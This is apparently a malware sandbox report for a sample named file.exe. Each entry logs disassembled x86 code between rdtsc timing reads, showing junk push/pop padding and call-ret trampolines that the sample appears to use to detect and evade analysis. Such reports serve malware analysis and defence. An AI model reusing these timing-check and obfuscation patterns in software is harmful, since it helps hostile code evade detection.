                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122F34F second address: 122F3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F0790D59B58h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov bx, E01Ch 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F0790D59B58h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 sub di, C65Fh 0x0000004a xchg eax, esi 0x0000004b pushad 0x0000004c push edx 0x0000004d push edx 0x0000004e pop edx 0x0000004f pop edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F0790D59B67h 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122F3C5 second address: 122F3D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnc 00007F0790DC9730h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1231393 second address: 1231398 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12304B1 second address: 12304CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0790D5812Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12304CA second address: 123055F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0790D580ACh 0x00000008 jns 00007F0790D580A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F0790D580A8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b js 00007F0790D580AEh 0x00000031 js 00007F0790D580A8h 0x00000037 mov ebx, edx 0x00000039 push dword ptr fs:[00000000h] 0x00000040 mov dword ptr [ebp+122D1AF8h], eax 0x00000046 mov dword ptr fs:[00000000h], esp 0x0000004d jbe 00007F0790D580A9h 0x00000053 mov di, dx 0x00000056 mov eax, dword ptr [ebp+122D0F81h] 0x0000005c push 00000000h 0x0000005e push esi 0x0000005f call 00007F0790D580A8h 0x00000064 pop esi 0x00000065 mov dword ptr [esp+04h], esi 0x00000069 add dword ptr [esp+04h], 0000001Ah 0x00000071 inc esi 0x00000072 push esi 0x00000073 ret 0x00000074 pop esi 0x00000075 ret 0x00000076 push FFFFFFFFh 0x00000078 mov ebx, dword ptr [ebp+122D2C47h] 0x0000007e push eax 0x0000007f push eax 0x00000080 push edx 0x00000081 push eax 0x00000082 push edx 0x00000083 push eax 0x00000084 pop eax 0x00000085 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123055F second address: 1230565 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233450 second address: 1233454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12389D6 second address: 12389E0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0790D58126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12389E0 second address: 12389F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F0790D580A6h 0x00000009 jmp 00007F0790D580AAh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1235CC5 second address: 1235CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123A277 second address: 123A27D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1235CC9 second address: 1235CD2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123AF13 second address: 123AF1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0790D580A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1236C90 second address: 1236D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push edx 0x00000009 call 00007F0790D58128h 0x0000000e pop edx 0x0000000f mov dword ptr [esp+04h], edx 0x00000013 add dword ptr [esp+04h], 0000001Ah 0x0000001b inc edx 0x0000001c push edx 0x0000001d ret 0x0000001e pop edx 0x0000001f ret 0x00000020 pushad 0x00000021 movzx ecx, cx 0x00000024 popad 0x00000025 push dword ptr fs:[00000000h] 0x0000002c sub dword ptr [ebp+122D3793h], eax 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov ebx, dword ptr [ebp+122D290Fh] 0x0000003f mov eax, dword ptr [ebp+122D140Dh] 0x00000045 push 00000000h 0x00000047 push eax 0x00000048 call 00007F0790D58128h 0x0000004d pop eax 0x0000004e mov dword ptr [esp+04h], eax 0x00000052 add dword ptr [esp+04h], 00000016h 0x0000005a inc eax 0x0000005b push eax 0x0000005c ret 0x0000005d pop eax 0x0000005e ret 0x0000005f sub dword ptr [ebp+122D28CDh], ebx 0x00000065 mov bx, di 0x00000068 push FFFFFFFFh 0x0000006a mov dword ptr [ebp+122D187Ch], esi 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 jp 00007F0790D58128h 0x00000079 push eax 0x0000007a pop eax 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123AF1D second address: 123AF21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123AF21 second address: 123AF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F0790D58132h 0x00000011 jmp 00007F0790D58134h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123AF54 second address: 123AF59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123BE4D second address: 123BE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123BE52 second address: 123BE5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0790D580A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123BE5C second address: 123BE79 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0790D58126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jne 00007F0790D58126h 0x00000016 jne 00007F0790D58126h 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123BE79 second address: 123BF00 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0790D580A8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F0790D580A8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e call 00007F0790D580A8h 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], edx 0x00000038 add dword ptr [esp+04h], 00000017h 0x00000040 inc edx 0x00000041 push edx 0x00000042 ret 0x00000043 pop edx 0x00000044 ret 0x00000045 jmp 00007F0790D580B8h 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F0790D580B9h 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123BF00 second address: 123BF06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D013 second address: 123D029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D580AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D029 second address: 123D0BB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 je 00007F0790D58138h 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F0790D5812Eh 0x00000016 popad 0x00000017 nop 0x00000018 sub edi, dword ptr [ebp+122D30A6h] 0x0000001e push dword ptr fs:[00000000h] 0x00000025 mov dword ptr [ebp+122D3035h], eax 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov dword ptr [ebp+12464DC9h], ecx 0x00000038 mov eax, dword ptr [ebp+122D142Dh] 0x0000003e sbb edi, 3A94060Ah 0x00000044 push FFFFFFFFh 0x00000046 push 00000000h 0x00000048 push eax 0x00000049 call 00007F0790D58128h 0x0000004e pop eax 0x0000004f mov dword ptr [esp+04h], eax 0x00000053 add dword ptr [esp+04h], 00000018h 0x0000005b inc eax 0x0000005c push eax 0x0000005d ret 0x0000005e pop eax 0x0000005f ret 0x00000060 jng 00007F0790D5812Ch 0x00000066 add edi, 6BC83A53h 0x0000006c nop 0x0000006d jmp 00007F0790D58130h 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 push ecx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D0BB second address: 123D0C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123E043 second address: 123E048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123E048 second address: 123E0F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F0790D580A6h 0x00000009 jmp 00007F0790D580B9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F0790D580A8h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e xor di, E627h 0x00000033 push dword ptr fs:[00000000h] 0x0000003a xor dword ptr [ebp+122D28B7h], edi 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 push 00000000h 0x00000049 push eax 0x0000004a call 00007F0790D580A8h 0x0000004f pop eax 0x00000050 mov dword ptr [esp+04h], eax 0x00000054 add dword ptr [esp+04h], 00000019h 0x0000005c inc eax 0x0000005d push eax 0x0000005e ret 0x0000005f pop eax 0x00000060 ret 0x00000061 sub dword ptr [ebp+122D2E1Ch], eax 0x00000067 mov eax, dword ptr [ebp+122D03D5h] 0x0000006d or dword ptr [ebp+122D2E16h], ecx 0x00000073 push FFFFFFFFh 0x00000075 jmp 00007F0790D580B4h 0x0000007a nop 0x0000007b pushad 0x0000007c pushad 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1241B73 second address: 1241B7F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0790D58126h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12444E3 second address: 12444E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12444E7 second address: 12444EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12444EB second address: 12444F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12444F4 second address: 12444FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCF8B second address: 11DCF9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F0790D580A6h 0x0000000a jp 00007F0790D580A6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247258 second address: 1247262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0790D58126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247262 second address: 1247266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247266 second address: 124726E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124726E second address: 1247273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247273 second address: 12472AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0790D58126h 0x0000000a jo 00007F0790D58126h 0x00000010 jmp 00007F0790D5812Fh 0x00000015 popad 0x00000016 push eax 0x00000017 jno 00007F0790D58126h 0x0000001d pop eax 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 push edi 0x00000022 pushad 0x00000023 popad 0x00000024 pop edi 0x00000025 jo 00007F0790D58128h 0x0000002b pushad 0x0000002c popad 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12472AD second address: 12472B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12473F0 second address: 12473F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12473F6 second address: 1247407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0790D580A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247407 second address: 124740B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3AD5 second address: 11E3AF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0790D580ADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jno 00007F0790D580A6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3AF2 second address: 11E3AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3AF8 second address: 11E3B08 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F0790D580A6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3B08 second address: 11E3B3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D58134h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0790D58130h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3B3A second address: 11E3B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3B3E second address: 11E3B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3B44 second address: 11E3B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3B4A second address: 11E3B59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0790D5812Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3B59 second address: 11E3B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3B5F second address: 11E3B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jbe 00007F0790D58126h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124C221 second address: 124C225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124C225 second address: 124C229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124C229 second address: 124C235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0790D580A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124F5E9 second address: 124F5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124F5ED second address: 124F5F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1254011 second address: 1254048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F0790D58130h 0x0000000b jmp 00007F0790D58132h 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007F0790D5812Ch 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1254048 second address: 1254050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1254050 second address: 1254064 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F0790D58128h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1254064 second address: 125406E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1254801 second address: 1254807 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1254807 second address: 1254824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F0790D580AEh 0x0000000c jns 00007F0790D580A6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1254824 second address: 1254828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1254828 second address: 1254832 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0790D580A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1254E3B second address: 1254E40 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255220 second address: 1255225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125A8C9 second address: 125A8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 je 00007F0790D58126h 0x0000000c pushad 0x0000000d popad 0x0000000e jng 00007F0790D58126h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125A8E1 second address: 125A8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DE981 second address: 11DE998 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D58131h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12596EF second address: 12596F5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125998F second address: 125999E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F0790D5812Eh 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125999E second address: 12599C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F0790D580B8h 0x0000000b jnl 00007F0790D580A6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259C86 second address: 1259CA6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 jmp 00007F0790D5812Bh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jne 00007F0790D58134h 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259CA6 second address: 1259CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259DF3 second address: 1259DF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259DF7 second address: 1259DFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259DFD second address: 1259E1D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0790D5812Ah 0x00000008 push esi 0x00000009 jmp 00007F0790D5812Bh 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259E1D second address: 1259E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
